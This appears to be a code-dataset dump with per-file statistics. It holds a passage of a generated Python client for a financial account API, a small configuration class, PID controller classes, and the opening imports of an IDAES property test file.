"""Subscribe an account # noqa: E501
After creating an account, you may create portfolios for the account to track a client’s investment, savings, or insurance products. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.subscribe_account_using_post(account_id, alloc_request, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str account_id: UUID account_id (required)
:param AccountAllocationMapping alloc_request: allocRequest (required)
:return: list[Portfolio]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.subscribe_account_using_post_with_http_info(account_id, alloc_request, **kwargs) # noqa: E501
else:
(data) = self.subscribe_account_using_post_with_http_info(account_id, alloc_request, **kwargs) # noqa: E501
return data
def subscribe_account_using_post_with_http_info(self, account_id, alloc_request, **kwargs): # noqa: E501
"""Subscribe an account # noqa: E501
After creating an account, you may create portfolios for the account to track a client’s investment, savings, or insurance products. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.subscribe_account_using_post_with_http_info(account_id, alloc_request, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str account_id: UUID account_id (required)
:param AccountAllocationMapping alloc_request: allocRequest (required)
:return: list[Portfolio]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id', 'alloc_request'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method subscribe_account_using_post" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if self.api_client.client_side_validation and ('account_id' not in params or
params['account_id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `account_id` when calling `subscribe_account_using_post`") # noqa: E501
# verify the required parameter 'alloc_request' is set
if self.api_client.client_side_validation and ('alloc_request' not in params or
params['alloc_request'] is None): # noqa: E501
raise ValueError("Missing the required parameter `alloc_request` when calling `subscribe_account_using_post`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['account_id'] = params['account_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'alloc_request' in params:
body_params = params['alloc_request']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/nucleus/v1/account/{account_id}/subscribe', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[Portfolio]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
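# Usage sketch (not executed): subscribing an account to an allocation.
# `alloc_request` is assumed to be an AccountAllocationMapping model instance
# built elsewhere (its fields are defined by that model and are not shown
# here); `api` and the UUID are as in the earlier sketches.
#
#   portfolios = api.subscribe_account_using_post(
#       "00000000-0000-0000-0000-000000000000", alloc_request)
#   for portfolio in portfolios:     # list[Portfolio]
#       print(portfolio)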
def update_account_allocation_mapping_using_put(self, account_allocation_id, account_allocation_mapping, **kwargs): # noqa: E501
"""Update an account allocation # noqa: E501
Update the information for an account-allocation mapping. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_account_allocation_mapping_using_put(account_allocation_id, account_allocation_mapping, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str account_allocation_id: UUID account_allocation_id (required)
:param object account_allocation_mapping: account_allocation_mapping (required)
:return: AccountAllocationMapping
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_account_allocation_mapping_using_put_with_http_info(account_allocation_id, account_allocation_mapping, **kwargs) # noqa: E501
else:
(data) = self.update_account_allocation_mapping_using_put_with_http_info(account_allocation_id, account_allocation_mapping, **kwargs) # noqa: E501
return data
def update_account_allocation_mapping_using_put_with_http_info(self, account_allocation_id, account_allocation_mapping, **kwargs): # noqa: E501
"""Update an account allocation # noqa: E501
Update the information for an account-allocation mapping. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_account_allocation_mapping_using_put_with_http_info(account_allocation_id, account_allocation_mapping, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str account_allocation_id: UUID account_allocation_id (required)
:param object account_allocation_mapping: account_allocation_mapping (required)
:return: AccountAllocationMapping
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_allocation_id', 'account_allocation_mapping'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_account_allocation_mapping_using_put" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_allocation_id' is set
if self.api_client.client_side_validation and ('account_allocation_id' not in params or
params['account_allocation_id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `account_allocation_id` when calling `update_account_allocation_mapping_using_put`") # noqa: E501
# verify the required parameter 'account_allocation_mapping' is set
if self.api_client.client_side_validation and ('account_allocation_mapping' not in params or
params['account_allocation_mapping'] is None): # noqa: E501
raise ValueError("Missing the required parameter `account_allocation_mapping` when calling `update_account_allocation_mapping_using_put`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_allocation_id' in params:
path_params['account_allocation_id'] = params['account_allocation_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'account_allocation_mapping' in params:
body_params = params['account_allocation_mapping']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/nucleus/v1/account_allocation/{account_allocation_id}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AccountAllocationMapping', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
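# Usage sketch (not executed): updating an account-allocation mapping. The
# body parameter is typed `object` above, so a plain dict of the fields to
# change is passed here; the field name and value are placeholders, and the
# UUID and `api` are as in the earlier sketches.
#
#   updated = api.update_account_allocation_mapping_using_put(
#       "00000000-0000-0000-0000-000000000000",
#       {"current_weight": 40.0})    # placeholder field/value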
def update_account_status_using_put(self, account_status, account_status_id, **kwargs): # noqa: E501
"""Update an account status # noqa: E501
Update an account status record for an account. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_account_status_using_put(account_status, account_status_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param object account_status: account_status (required)
:param str account_status_id: UUID account_status_id (required)
:return: AccountStatus
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_account_status_using_put_with_http_info(account_status, account_status_id, **kwargs) # noqa: E501
else:
(data) = self.update_account_status_using_put_with_http_info(account_status, account_status_id, **kwargs) # noqa: E501
return data
def update_account_status_using_put_with_http_info(self, account_status, account_status_id, **kwargs): # noqa: E501
"""Update an account status # noqa: E501
Update an account status record for an account. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_account_status_using_put_with_http_info(account_status, account_status_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param object account_status: account_status (required)
:param str account_status_id: UUID account_status_id (required)
:return: AccountStatus
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_status', 'account_status_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_account_status_using_put" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_status' is set
if self.api_client.client_side_validation and ('account_status' not in params or
params['account_status'] is None): # noqa: E501
raise ValueError("Missing the required parameter `account_status` when calling `update_account_status_using_put`") # noqa: E501
# verify the required parameter 'account_status_id' is set
if self.api_client.client_side_validation and ('account_status_id' not in params or
params['account_status_id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `account_status_id` when calling `update_account_status_using_put`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_status_id' in params:
path_params['account_status_id'] = params['account_status_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'account_status' in params:
body_params = params['account_status']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/nucleus/v1/account_status/{account_status_id}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AccountStatus', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_account_type_using_put(self, account_type, account_type_id, **kwargs): # noqa: E501
"""Update an account type # noqa: E501
Update the information for a possible account type defined for your firm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_account_type_using_put(account_type, account_type_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param object account_type: account_type (required)
:param str account_type_id: UUID account_type_id (required)
:return: AccountType
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_account_type_using_put_with_http_info(account_type, account_type_id, **kwargs) # noqa: E501
else:
(data) = self.update_account_type_using_put_with_http_info(account_type, account_type_id, **kwargs) # noqa: E501
return data
def update_account_type_using_put_with_http_info(self, account_type, account_type_id, **kwargs): # noqa: E501
"""Update an account type # noqa: E501
Update the information for a possible account type defined for your firm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_account_type_using_put_with_http_info(account_type, account_type_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param object account_type: account_type (required)
:param str account_type_id: UUID account_type_id (required)
:return: AccountType
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_type', 'account_type_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_account_type_using_put" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_type' is set
if self.api_client.client_side_validation and ('account_type' not in params or
params['account_type'] is None): # noqa: E501
raise ValueError("Missing the required parameter `account_type` when calling `update_account_type_using_put`") # noqa: E501
# verify the required parameter 'account_type_id' is set
if self.api_client.client_side_validation and ('account_type_id' not in params or
params['account_type_id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `account_type_id` when calling `update_account_type_using_put`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_type_id' in params:
path_params['account_type_id'] = params['account_type_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'account_type' in params:
body_params = params['account_type']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/nucleus/v1/account_type/{account_type_id}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AccountType', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_account_using_put(self, account, account_id, **kwargs): # noqa: E501
"""Update an account # noqa: E501
Update the information for an account. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_account_using_put(account, account_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param object account: account (required)
:param str account_id: UUID account_id (required)
:return: Account
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_account_using_put_with_http_info(account, account_id, **kwargs) # noqa: E501
else:
(data) = self.update_account_using_put_with_http_info(account, account_id, **kwargs) # noqa: E501
return data
def update_account_using_put_with_http_info(self, account, account_id, **kwargs): # noqa: E501
"""Update an account # noqa: E501
Update the information for an account. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_account_using_put_with_http_info(account, account_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param object account: account (required)
:param str account_id: UUID account_id (required)
:return: Account
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account', 'account_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_account_using_put" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account' is set
if self.api_client.client_side_validation and ('account' not in params or
params['account'] is None): # noqa: E501
raise ValueError("Missing the required parameter `account` when calling `update_account_using_put`") # noqa: E501
# verify the required parameter 'account_id' is set
if self.api_client.client_side_validation and ('account_id' not in params or
params['account_id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `account_id` when calling `update_account_using_put`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['account_id'] = params['account_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'account' in params:
body_params = params['account']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/nucleus/v1/account/{account_id}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Account', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_client_account_permission_using_put(self, account_id, acl_client_permission_vo, **kwargs): # noqa: E501
"""Update an account permission # noqa: E501
Update an account permission # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_client_account_permission_using_put(account_id, acl_client_permission_vo, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str account_id: account_id (required)
:param object acl_client_permission_vo: aclClientPermissionVO (required)
:return: AccountPermissionVO
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.update_client_account_permission_using_put_with_http_info(account_id, acl_client_permission_vo, **kwargs) # noqa: E501
else:
(data) = self.update_client_account_permission_using_put_with_http_info(account_id, acl_client_permission_vo, **kwargs) # noqa: E501
return data
def update_client_account_permission_using_put_with_http_info(self, account_id, acl_client_permission_vo, **kwargs): # noqa: E501
"""Update an account permission # noqa: E501
Update an account permission # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_client_account_permission_using_put_with_http_info(account_id, acl_client_permission_vo, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str account_id: account_id (required)
:param object acl_client_permission_vo: aclClientPermissionVO (required)
:return: AccountPermissionVO
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id', 'acl_client_permission_vo'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_client_account_permission_using_put" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if self.api_client.client_side_validation and ('account_id' not in params or
params['account_id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `account_id` when calling `update_client_account_permission_using_put`") # noqa: E501
# verify the required parameter 'acl_client_permission_vo' is set
if self.api_client.client_side_validation and ('acl_client_permission_vo' not in params or
params['acl_client_permission_vo'] is None): # noqa: E501
raise ValueError("Missing the required parameter `acl_client_permission_vo` when calling `update_client_account_permission_using_put`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['account_id'] = params['account_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'acl_client_permission_vo' in params:
body_params = params['acl_client_permission_vo']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
return self.api_client.call_api(
'/nucleus/v1/account_permission/{account_id}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AccountPermissionVO', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
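The update_* methods above all follow the same generated calling pattern described in their docstrings: synchronous by default, or thread-based when async_req=True is passed. A minimal usage sketch follows; how the api object is constructed (its class name and client configuration) is not shown in this part of the file and is assumed here, and the payload values are placeholders.

# Sketch only. `api` is assumed to be an instance of the API class defined in this
# module, built on an authenticated ApiClient; that setup is not shown here.
account = {}  # placeholder request body; real fields come from the API specification
account_id = "00000000-0000-0000-0000-000000000000"  # placeholder UUID

# Synchronous call: returns the deserialized Account model.
updated = api.update_account_using_put(account, account_id)

# Asynchronous call: returns a thread whose .get() blocks for the result.
thread = api.update_account_using_put(account, account_id, async_req=True)
updated = thread.get()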
| 43.211802
| 167
| 0.625959
| 15,712
| 135,469
| 5.091713
| 0.01623
| 0.051299
| 0.021
| 0.027
| 0.988863
| 0.985213
| 0.980375
| 0.971713
| 0.965825
| 0.957051
| 0
| 0.016686
| 0.28862
| 135,469
| 3,134
| 168
| 43.22559
| 0.813459
| 0.323277
| 0
| 0.823703
| 1
| 0
| 0.20217
| 0.076147
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035967
| false
| 0
| 0.002358
| 0
| 0.091981
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
d10240002c5a216c84e2a273492d6c99b22a5786 | 312 | py | Python | src/configuration.py | premkamal13/my-ai-assistant | 8c2e60cf74ae36d0ad1177430651f34a59230f52 | ["MIT"] | 1 | 2019-07-12T07:40:47.000Z | 2019-07-12T07:40:47.000Z | src/configuration.py | premkamal13/my-ai-assistant | 8c2e60cf74ae36d0ad1177430651f34a59230f52 | ["MIT"] | null | null | null | src/configuration.py | premkamal13/my-ai-assistant | 8c2e60cf74ae36d0ad1177430651f34a59230f52 | ["MIT"] | null | null | null |
class Configuration:
def __init__(self, assistant_name, user_name, wolfram_app_id):
self.assistant_name = assistant_name
self.user_name = user_name
self.wolfram_app_id = wolfram_app_id
def __call__(self):
return [self.assistant_name, self.user_name, self.wolfram_app_id]
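For illustration only, here is how the class above would typically be instantiated and called; the argument values are invented placeholders, not taken from the repository.

# Placeholder values, purely illustrative.
config = Configuration(assistant_name="Nova", user_name="Alice", wolfram_app_id="DEMO-APPID")
assistant_name, user_name, wolfram_app_id = config()  # __call__ returns the three fields as a list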
| 34.666667
| 73
| 0.724359
| 43
| 312
| 4.697674
| 0.302326
| 0.257426
| 0.237624
| 0.207921
| 0.445545
| 0.237624
| 0
| 0
| 0
| 0
| 0
| 0
| 0.201923
| 312
| 8
| 74
| 39
| 0.811245
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.285714
| false
| 0
| 0
| 0.142857
| 0.571429
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
d1270a7fd13b18a0c549eb70355c9167da5fe5c2 | 4,920 | py | Python | vplatoon/pid.py | aladinoster/vplatoon | eb925acfd553d9062273210918e4c4c044dabbe7 | ["MIT"] | 1 | 2020-11-27T00:45:36.000Z | 2020-11-27T00:45:36.000Z | vplatoon/pid.py | aladinoster/vplatoon | eb925acfd553d9062273210918e4c4c044dabbe7 | ["MIT"] | 2 | 2020-10-26T13:27:13.000Z | 2020-11-07T08:28:06.000Z | vplatoon/pid.py | aladinoster/vplatoon | eb925acfd553d9062273210918e4c4c044dabbe7 | ["MIT"] | 2 | 2020-10-26T11:04:56.000Z | 2020-10-27T12:36:02.000Z |
import numpy as np
from .vehicles import DT, Derivator, Integrator
# ==============================================================================
# Constants
# ==============================================================================
TS = DT # Sampling time
U_MAX = 1 # Control default
# ==============================================================================
# Classes
# ==============================================================================
class PID:
def __init__(self, k_p, k_i, k_d):
# Ziegler Nichols method
# Check here https://en.wikipedia.org/wiki/Ziegler–Nichols_method
# self.k_p = 0.3*K_u
# self.k_i = 1.2*K_u/T_u
# self.k_d = 3*K_u*T_u/40
# self.k_p = 0.45*K_u
# self.k_i = 0.54*K_u/T_u
self.k_p = k_p
self.k_i = k_i
self.k_d = k_d
self.T = TS # Sampling time
self.t = [0]
self.u_p = [0] # Proportional term
self.u_i = [0] # Integral term
self.u_d = [0] # Derivative term
self.control = [0] # Control memory
self.integ = Integrator()
self.diff = Derivator()
def apply_control(self, error):
P = self.k_p * error
self.u_p.append(P)
I = self.k_i * self.integ(error)
self.u_i.append(I)
D = self.k_d * self.diff(error)
self.u_d.append(D)
u_f = self.u_p[-1] + self.u_i[-1] + self.u_d[-1]
self.time_update()
self.control.append(u_f)
return u_f
def time_update(self):
""" time vector"""
self.t.append(self.t[-1] + self.T)
def __call__(self, error):
""" Callable """
return self.apply_control(error)
U_MAX = 10
class PIDlim:
def __init__(self, k_p, k_i, k_d, u_max=U_MAX):
# Ziegler Nichols method
# Check here https://en.wikipedia.org/wiki/Ziegler–Nichols_method
# self.k_p = 0.3*K_u
# self.k_i = 1.2*K_u/T_u
# self.k_d = 3*K_u*T_u/40
# self.k_p = 0.45*K_u
# self.k_i = 0.54*K_u/T_u
self.k_p = k_p
self.k_i = k_i
self.k_d = k_d
self.T = TS # Sampling time
self.t = [0]
self.u_p = [0] # Proportional term
self.u_i = [0] # Integral term
self.u_d = [0] # Derivative term
self.u_max = u_max
self.u_min = -u_max
self.control = [0] # Control memory
self.control_bnd = [0]
self.integ = Integrator()
self.diff = Derivator()
def apply_control(self, error):
P = self.k_p * error
self.u_p.append(P)
I = self.k_i * self.integ(error)
self.u_i.append(I)
D = self.k_d * self.diff(error)
self.u_d.append(D)
u_f = self.u_p[-1] + self.u_i[-1] + self.u_d[-1]
self.control.append(u_f)
# Bound control
u_f = max(self.u_min, min(u_f, self.u_max))
self.control_bnd.append(u_f)
self.time_update()
return u_f
def time_update(self):
""" time vector"""
self.t.append(self.t[-1] + self.T)
def __call__(self, error):
""" Callable """
return self.apply_control(error)
class PIDantiwindup:
def __init__(self, k_p, k_i, k_d, u_max=U_MAX):
# Ziegler Nichols method
# Check here https://en.wikipedia.org/wiki/Ziegler–Nichols_method
# self.k_p = 0.3*K_u
# self.k_i = 1.2*K_u/T_u
# self.k_d = 3*K_u*T_u/40
# self.k_p = 0.45*K_u
# self.k_i = 0.54*K_u/T_u
self.k_p = k_p
self.k_i = k_i
self.k_d = k_d
self.T = TS # Sampling time
self.t = [0]
self.u_p = [0] # Proportional term
self.u_i = [0] # Integral term
self.u_d = [0] # Derivative term
self.u_max = u_max
self.u_min = -u_max
self.control = [0] # Control memory
self.control_bnd = [0]
self.T_t = 1 # Time constant for integration reset
self.integ = Integrator()
self.diff = Derivator()
def apply_control(self, error):
P = self.k_p * error
self.u_p.append(P)
wind_reset = (self.control_bnd[-1] - self.control[-1]) / self.T_t
I = self.integ(self.k_i * error + wind_reset) # Anti windup mechanism
self.u_i.append(I)
D = self.k_d * self.diff(error)
self.u_d.append(D)
u_f = self.u_p[-1] + self.u_i[-1] + self.u_d[-1]
self.control.append(u_f)
# Bound control
u_f = max(self.u_min, min(u_f, self.u_max))
self.control_bnd.append(u_f)
self.time_update()
return u_f
def time_update(self):
""" time vector"""
self.t.append(self.t[-1] + self.T)
def __call__(self, error):
""" Callable """
return self.apply_control(error)
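A self-contained sketch of how a discrete PID loop like the classes above is typically driven. The real Integrator and Derivator are imported from .vehicles and are not shown in this file, so simple forward-Euler and backward-difference stand-ins are assumed here, along with a made-up sampling time and a toy first-order plant.

DT_SKETCH = 0.1  # assumed sampling time; the module above takes DT from .vehicles

class SketchIntegrator:
    """Forward-Euler accumulator, a stand-in for the real Integrator."""
    def __init__(self):
        self.total = 0.0
    def __call__(self, x):
        self.total += x * DT_SKETCH
        return self.total

class SketchDerivator:
    """Backward difference, a stand-in for the real Derivator."""
    def __init__(self):
        self.prev = 0.0
    def __call__(self, x):
        d = (x - self.prev) / DT_SKETCH
        self.prev = x
        return d

# Closed-loop use: track a constant reference with a toy first-order plant.
k_p, k_i, k_d = 0.5, 0.2, 0.05
integ, diff = SketchIntegrator(), SketchDerivator()
u_min, u_max = -1.0, 1.0
y, reference = 0.0, 1.0
for _ in range(100):
    error = reference - y
    u = k_p * error + k_i * integ(error) + k_d * diff(error)
    u = max(u_min, min(u, u_max))   # same saturation as PIDlim / PIDantiwindup
    y += DT_SKETCH * (u - y)        # toy plant: dy/dt = u - y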
| 25.102041
| 80
| 0.499187
| 744
| 4,920
| 3.05914
| 0.102151
| 0.079086
| 0.039543
| 0.015817
| 0.875659
| 0.867311
| 0.858084
| 0.858084
| 0.858084
| 0.850615
| 0
| 0.021998
| 0.31626
| 4,920
| 195
| 81
| 25.230769
| 0.653686
| 0.284146
| 0
| 0.881188
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.118812
| false
| 0
| 0.019802
| 0
| 0.227723
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d1755398a5ac669581eb79a0ec0ecb4b2360b261 | 62,240 | py | Python | idaes/models/properties/modular_properties/state_definitions/tests/test_FTPx.py | OOAmusat/idaes-pse | ae7d3bb8e372bc32822dcdcb75e9fd96b78da539 | ["RSA-MD"] | null | null | null | idaes/models/properties/modular_properties/state_definitions/tests/test_FTPx.py | OOAmusat/idaes-pse | ae7d3bb8e372bc32822dcdcb75e9fd96b78da539 | ["RSA-MD"] | null | null | null | idaes/models/properties/modular_properties/state_definitions/tests/test_FTPx.py | OOAmusat/idaes-pse | ae7d3bb8e372bc32822dcdcb75e9fd96b78da539 | ["RSA-MD"] | 1 | 2022-03-17T11:08:43.000Z | 2022-03-17T11:08:43.000Z |
#################################################################################
# The Institute for the Design of Advanced Energy Systems Integrated Platform
# Framework (IDAES IP) was produced under the DOE Institute for the
# Design of Advanced Energy Systems (IDAES), and is copyright (c) 2018-2021
# by the software owners: The Regents of the University of California, through
# Lawrence Berkeley National Laboratory, National Technology & Engineering
# Solutions of Sandia, LLC, Carnegie Mellon University, West Virginia University
# Research Corporation, et al. All rights reserved.
#
# Please see the files COPYRIGHT.md and LICENSE.md for full copyright and
# license information.
#################################################################################
"""
Tests for FTP state formulation
Authors: Andrew Lee
"""
import pytest
import numpy as np
from pytest import approx
from sys import modules
from pyomo.environ import (
ConcreteModel,
Constraint,
Expression,
value,
Var,
Set,
units as pyunits,
)
from pyomo.util.check_units import check_units_equivalent, assert_units_consistent
# Need define_default_scaling_factors, even though it is not used directly
from idaes.models.properties.modular_properties.state_definitions.FTPx import (
FTPx,
define_state,
set_metadata,
